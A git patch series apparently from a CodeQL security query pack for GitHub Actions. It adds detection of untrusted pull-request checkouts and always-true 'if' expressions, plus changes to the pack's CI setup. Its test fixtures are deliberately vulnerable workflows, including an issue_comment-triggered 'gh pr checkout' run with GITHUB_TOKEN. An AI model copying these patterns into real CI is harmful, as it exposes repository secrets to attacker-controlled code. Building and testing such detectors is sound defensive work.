.../.github/workflows/untrusted_checkout2.yml | 19 +++++++++++++++++ 3 files changed, 46 insertions(+), 1 deletion(-) create mode 100644 ql/lib/ext/sergeysova_jq-action.model.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml new file mode 100644 index 000000000000..8ab1d090b1cc --- /dev/null +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] + diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 40f6d2fec9e6..c9cbb0ab13c7 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -66,7 +66,8 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bhead\\.sha\\b", "\\bhead\\.ref\\b" + // heuristics + "\\bhead\\.sha\\b", "\\bhead\\.ref\\b", "\\bpr_number\\b", "\\bpr_head_sha\\b" ], _, _) ) } @@ -121,6 +122,24 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhCheckout extends PRHeadCheckoutStep instanceof Run { + GhCheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and + ( + containsHeadRef(line) + or + exists(string varname | + containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + from Workflow w, PRHeadCheckoutStep checkout where w.isPrivileged() and diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml new file mode 100644 index 000000000000..d9e5d6be6707 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -0,0 +1,19 @@ +on: issue_comment + +jobs: + build: + runs-on: ubuntu-latest + steps: + - name: Get PR number + id: pr_number + if: ${{ github.event_name == 'issue_comment'}} + run: | + PR_URL="${{ github.event.issue.pull_request.url }}" + PR_NUMBER=${PR_URL##*/} + echo "number=$PR_NUMBER" >> $GITHUB_OUTPUT + - name: Checkout Pull Request + if: github.event_name == 'issue_comment' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} From afaab8b644e8b99a1d78f278afd7760a2b2f575a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:26:21 +0200 Subject: [PATCH 180/707] add tests --- ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index dc457c6a8a7a..27f6bbca39ce 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -18,6 +18,7 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From d4d3957392a16149b6b7e59a9d66e022439d8f84 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:29:14 +0200 Subject: [PATCH 181/707] Create test.yml --- .github/workflows/test.yml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .github/workflows/test.yml diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml new file mode 100644 index 000000000000..8d24f44ed320 --- /dev/null +++ b/.github/workflows/test.yml @@ -0,0 +1,14 @@ +name: Tests +on: + push: + pull_request: + +permissions: {} + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - run: | + codeql test run ql/test From 86cc50971b00ee7444bb6d13cc9483d3ed38480a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:30:15 +0200 Subject: [PATCH 182/707] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 8d24f44ed320..bbd894057bcb 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -2,6 +2,7 @@ name: Tests on: push: pull_request: + workflow_dispatch: permissions: {} From a29e0c438d6fe730700769a99138c737344ff185 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:38:27 +0200 Subject: [PATCH 183/707] Update test.yml --- .github/workflows/test.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index bbd894057bcb..e50408349851 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -11,5 +11,9 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 + - run: | codeql test run ql/test From a4cf78b9ed6bcc7d08311e4aebd565480b1b2205 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:43:20 +0200 Subject: [PATCH 184/707] Update test.yml --- .github/workflows/test.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index e50408349851..6e190ff96124 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -4,15 +4,13 @@ on: pull_request: workflow_dispatch: -permissions: {} - jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 with: - token: ${{ secrets.BUGHALLA_TOKEN }} + token: ${{ secrets.SECLAB_TOKEN }} fetch-depth: 0 - run: | From bd4f158b22ebcc90cc6e42d7a3c95e879b03a7ad Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:48:40 +0200 Subject: [PATCH 185/707] Update test.yml --- .github/workflows/test.yml | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 6e190ff96124..a0dc2688ce2a 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,9 +9,22 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 + - name: Find codeql + id: find-codeql + uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 with: - token: ${{ secrets.SECLAB_TOKEN }} - fetch-depth: 0 - + languages: javascript # does not matter + - name: Initialize CodeQL + id: init + run: | + # Take the most modern version + VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ + | sort \ + | tail -n 1 \ + | tr -d '\n')" + + CODEQL="$VERSION/x64/codeql/" + "${CODEQL}"/codeql version --format=json + echo "${CODEQL}" >> $GITHUB_PATH - run: | codeql test run ql/test From 591dfe07fefd261a0110adc17dce77bdbb9627fc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:55:09 +0200 Subject: [PATCH 186/707] Update copy-to-bughalla.yml --- .github/workflows/copy-to-bughalla.yml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 9e0fee9a0f7e..0384660acc11 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -10,10 +10,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - with: - token: ${{ secrets.BUGHALLA_TOKEN }} - fetch-depth: 0 - - run: | rm -rf .github/workflows/copy-to-bughalla.yml git remote set-url --push origin git@github.com:bughalla/codeql-actions @@ -28,4 +24,4 @@ jobs: repository: bughalla/codeql-actions github_token: ${{ secrets.BUGHALLA_TOKEN }} branch: ${{ github.ref }} - force: true \ No newline at end of file + force: true From 5d5a02ccc34aeefdbefa78ffa673a6300d593e11 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 22:02:04 +0200 Subject: [PATCH 187/707] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index a0dc2688ce2a..4aeed100c801 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -27,4 +27,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/lib codeql test run ql/test From d69c10c4f6f57cc3a2793ae8c6eb676d99dcabd2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 09:40:44 +0200 Subject: [PATCH 188/707] Update test.yml --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 4aeed100c801..245baea46679 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -27,5 +27,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | - codeql pack install ql/lib + codeql pack download ql/lib codeql test run ql/test From c681b13046ad5379fcb7a8e8e748ea3487c7b236 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 19 Apr 2024 09:55:12 +0200 Subject: [PATCH 189/707] Update copy-to-bughalla.yml --- .github/workflows/copy-to-bughalla.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 0384660acc11..572d987ce377 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -10,6 +10,10 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 + - run: | rm -rf .github/workflows/copy-to-bughalla.yml git remote set-url --push origin git@github.com:bughalla/codeql-actions From 6bc0d6dc32ec9f20a541ded7ecd4cce3b70b701c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 09:59:15 +0200 Subject: [PATCH 190/707] Update test.yml --- .github/workflows/test.yml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 245baea46679..227b834f0395 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,11 +9,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Find codeql - id: find-codeql - uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 - with: - languages: javascript # does not matter - name: Initialize CodeQL id: init run: | From 8c8a9b8a189d83c077687a1fe5db0d46614b96bb Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 19 Apr 2024 10:01:55 +0200 Subject: [PATCH 191/707] Update test.yml --- .github/workflows/test.yml | 17 +++++------------ 1 file changed, 5 insertions(+), 12 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 227b834f0395..893934079485 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,18 +9,11 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Initialize CodeQL - id: init - run: | - # Take the most modern version - VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ - | sort \ - | tail -n 1 \ - | tr -d '\n')" - - CODEQL="$VERSION/x64/codeql/" - "${CODEQL}"/codeql version --format=json - echo "${CODEQL}" >> $GITHUB_PATH + - name: Find codeql + id: find-codeql + uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 + with: + languages: javascript # does not matter - run: | codeql pack download ql/lib codeql test run ql/test From 5190e0865cdfcd57fc6d62c61aeca8d4d3da16e7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 10:29:12 +0200 Subject: [PATCH 192/707] Update test.yml --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 893934079485..5efa1ae3dae9 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -5,7 +5,7 @@ on: workflow_dispatch: jobs: - build: + tests: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 From e200746678e0bf2a7944f919d4817ebf46ab1f2a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:31:22 +0200 Subject: [PATCH 193/707] remove qlpack locks from repo --- .gitignore | 3 ++- ql/src/codeql-pack.lock.yml | 16 ---------------- ql/test/codeql-pack.lock.yml | 16 ---------------- 3 files changed, 2 insertions(+), 33 deletions(-) delete mode 100644 ql/src/codeql-pack.lock.yml delete mode 100644 ql/test/codeql-pack.lock.yml diff --git a/.gitignore b/.gitignore index 4ba9d315acc7..b874cdb64cea 100644 --- a/.gitignore +++ b/.gitignore @@ -1,7 +1,8 @@ .DS_Store **/*.testproj +**/codeql-pack.lock.yml ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ db/ -.cache \ No newline at end of file +.cache diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml deleted file mode 100644 index 56f10b81e0c7..000000000000 --- a/ql/src/codeql-pack.lock.yml +++ /dev/null @@ -1,16 +0,0 @@ ---- -lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 0.1.7 - codeql/dataflow: - version: 0.1.7 - codeql/ssa: - version: 0.2.7 - codeql/typetracking: - version: 0.2.7 - codeql/util: - version: 0.2.7 - codeql/yaml: - version: 0.2.7 -compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml deleted file mode 100644 index 8494dea432f7..000000000000 --- a/ql/test/codeql-pack.lock.yml +++ /dev/null @@ -1,16 +0,0 @@ ---- -lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 0.1.8 - codeql/dataflow: - version: 0.1.8 - codeql/ssa: - version: 0.2.8 - codeql/typetracking: - version: 0.2.8 - codeql/util: - version: 0.2.8 - codeql/yaml: - version: 0.2.9 -compiled: false From 96abb193c76193ccf7799fd7acd6dae5b53ae736 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:39:03 +0200 Subject: [PATCH 194/707] Update test.yml --- .github/workflows/test.yml | 18 ++++++++++++------ 1 file changed, 12 insertions(+), 6 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 5efa1ae3dae9..f8071c2986d9 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,11 +9,17 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Find codeql - id: find-codeql - uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 - with: - languages: javascript # does not matter + - name: Initialize CodeQL + id: init + run: | + # Take the most modern version + VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ + | sort \ + | tail -n 1 \ + | tr -d '\n')" + + CODEQL="$VERSION/x64/codeql/" + "${CODEQL}"/codeql version --format=json + echo "${CODEQL}" >> $GITHUB_PATH - run: | - codeql pack download ql/lib codeql test run ql/test From 071329400686f658fae6fd54eaf1fbaf696373f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:52:56 +0200 Subject: [PATCH 195/707] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index f8071c2986d9..390b35cd2336 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -22,4 +22,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/test codeql test run ql/test From 417830020df70d6b5e169c948d1fd29669d0be8a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:55:08 +0200 Subject: [PATCH 196/707] Update test.yml --- .github/workflows/test.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 390b35cd2336..51d66e5ee486 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -22,5 +22,7 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/lib + codeql pack install ql/src codeql pack install ql/test codeql test run ql/test From ecf81989844d4ce2f27703b981a0954448afaa59 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:00:02 +0200 Subject: [PATCH 197/707] Update test.yml --- .github/workflows/test.yml | 21 ++++++++++----------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 51d66e5ee486..78808fb82111 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,18 +9,17 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Initialize CodeQL - id: init + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} run: | - # Take the most modern version - VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ - | sort \ - | tail -n 1 \ - | tr -d '\n')" - - CODEQL="$VERSION/x64/codeql/" - "${CODEQL}"/codeql version --format=json - echo "${CODEQL}" >> $GITHUB_PATH + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" - run: | codeql pack install ql/lib codeql pack install ql/src From 843d9e24c4c49ec180b6766c573df02fcd4d03ce Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:05:09 +0200 Subject: [PATCH 198/707] Update test.yml --- .github/workflows/test.yml | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 78808fb82111..ed4997285c68 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -20,8 +20,17 @@ jobs: printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" - - run: | - codeql pack install ql/lib - codeql pack install ql/src - codeql pack install ql/test + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql # to make stubs available for tests + codeql pack download "codeql/actions-queries" + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" + - name: Run Tests + env: + GITHUB_TOKEN: ${{ github.token }} + run: | codeql test run ql/test From a222bfc33d3c3d8b513cd752cdd934b22467e8f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:07:00 +0200 Subject: [PATCH 199/707] Update test.yml --- .github/workflows/test.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index ed4997285c68..8b14b75062a5 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -24,8 +24,7 @@ jobs: env: GITHUB_TOKEN: ${{ github.token }} run: | - gh repo clone github/codeql # to make stubs available for tests - codeql pack download "codeql/actions-queries" + gh repo clone github/codeql codeql pack install "ql/lib" codeql pack install "ql/src" codeql pack install "ql/test" From febba3d6d303da77541c32569e136c36c8a40ba4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:22:20 +0200 Subject: [PATCH 200/707] Update gitignore --- .gitignore | 1 - 1 file changed, 1 deletion(-) diff --git a/.gitignore b/.gitignore index b874cdb64cea..173a5dd5d09f 100644 --- a/.gitignore +++ b/.gitignore @@ -1,6 +1,5 @@ .DS_Store **/*.testproj -**/codeql-pack.lock.yml ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ From 19a87a13db5b6fc67ff1bd9df5891dad996ae783 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:22:58 +0200 Subject: [PATCH 201/707] Update lock files --- ql/lib/codeql-pack.lock.yml | 16 ++++++++++++++++ ql/lib/qlpack.yml | 8 ++++---- ql/src/codeql-pack.lock.yml | 16 ++++++++++++++++ ql/test/codeql-pack.lock.yml | 16 ++++++++++++++++ 4 files changed, 52 insertions(+), 4 deletions(-) create mode 100644 ql/lib/codeql-pack.lock.yml create mode 100644 ql/src/codeql-pack.lock.yml create mode 100644 ql/test/codeql-pack.lock.yml diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml new file mode 100644 index 000000000000..84a6ccba26dc --- /dev/null +++ b/ql/lib/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ff8e02aa63e1..64e2861cf688 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.11 dependencies: - codeql/controlflow: "*" - codeql/dataflow: "*" - codeql/util: "*" - codeql/yaml: "*" + codeql/util: ^0.2.0 + codeql/yaml: ^0.1.2 + codeql/controlflow: ^0.1.0 + codeql/dataflow: ^0.1.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml new file mode 100644 index 000000000000..84a6ccba26dc --- /dev/null +++ b/ql/src/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml new file mode 100644 index 000000000000..84a6ccba26dc --- /dev/null +++ b/ql/test/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false From cb1e19a3179831f70d3a85e4f50346e795ba9adc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:19:10 +0200 Subject: [PATCH 202/707] New ExpressionIdAlwaysTrue query --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 3 + .../CWE-571/ExpressionIsAlwaysTrue.ql | 24 ++++++++ .../CWE-571/.github/workflows/test.yml | 60 +++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.qlref | 1 + 5 files changed, 90 insertions(+) create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql create mode 100644 ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 7e1bfdee589a..8a3dfb7b2a72 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -332,6 +332,8 @@ class If extends AstNode instanceof IfImpl { string getCondition() { result = super.getCondition() } Expression getConditionExpr() { result = super.getConditionExpr() } + + string getConditionStyle() { result = super.getConditionStyle() } } abstract class Uses extends AstNode instanceof UsesImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a66befe7d7d2..dff5f351a69b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -666,6 +666,9 @@ class IfImpl extends AstNodeImpl, TIfNode { /** Gets the condition that must be satisfied for this job to run. */ ExpressionImpl getConditionExpr() { result.getParentNode().getNode() = n } + + /** Get condition scalar style. */ + string getConditionStyle() { result = n.(YamlScalar).getStyle() } } class EnvImpl extends AstNodeImpl, TEnvNode { diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql new file mode 100644 index 000000000000..0a951cbabe1a --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -0,0 +1,24 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @security-severity 9.0 + * @problem.severity error + * @precision high + * @id actions/if-expression-always-true + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions + +from If i +where + i.getConditionStyle() = ["|", ">"] + or + i.getCondition().matches("%${{%") and + not i.getCondition().matches("${{%") + or + count(i.getCondition().splitAt("${{")) > 2 +select i, "Expression always evaluates to true" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml new file mode 100644 index 000000000000..16b725b5ee8d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml @@ -0,0 +1,60 @@ +name: Conditionally process PR + +on: + pull_request_target: + types: [opened, synchronize, reopened] + +jobs: + process-pr: + runs-on: ubuntu-latest + steps: + - name: Test1 + if: 1 == 2 + run: echo "Test 1 should not be printed" + - name: Test 2 + if: | + ${{ + 1 == 2 || + 3 == 4 + }} + run: echo "Test 2 should not be printed" + - name: Test 3 + if: ${{ 1 == 2 }} + run: echo "Test 3 should not be printed" + - name: Test 4 + if: ${{ 1 == 2 }} + run: echo "Test 4 should not be printed" + - name: Test 5 + if: ${{ + 1 == 2 || + 3 == 4 + }} + run: echo "Test 5 should not be printed" + - name: Test 6 + if: ${{ 1 == 1 }} ${{ 1 == 2 }} + run: echo "Test 6 should not be printed" + - name: Test 7 + run: echo "Test 7 should not be printed" + if: ${{ + 1 == 2 || + 3 == 4 + }} + + - name: Test 8 + run: echo "Test 8 should not be printed" + if: > + ${{ + 1 == 2 || + 3 == 4 }} + - name: Test 9 + if: '${{ 1 == 2 }}' + run: echo "Test 9 should not be printed" + - name: Test 10 + if: "${{1 == 2 }}" + run: echo "Test 10 should not be printed" + - name: Test 11 + if: " ${{ 1 == 2 }}" + run: echo "Test 11 should not be printed" + - name: Test 12 + if: " ${{ 1 == 2 }}" + run: echo "Test 12 should not be printed" diff --git 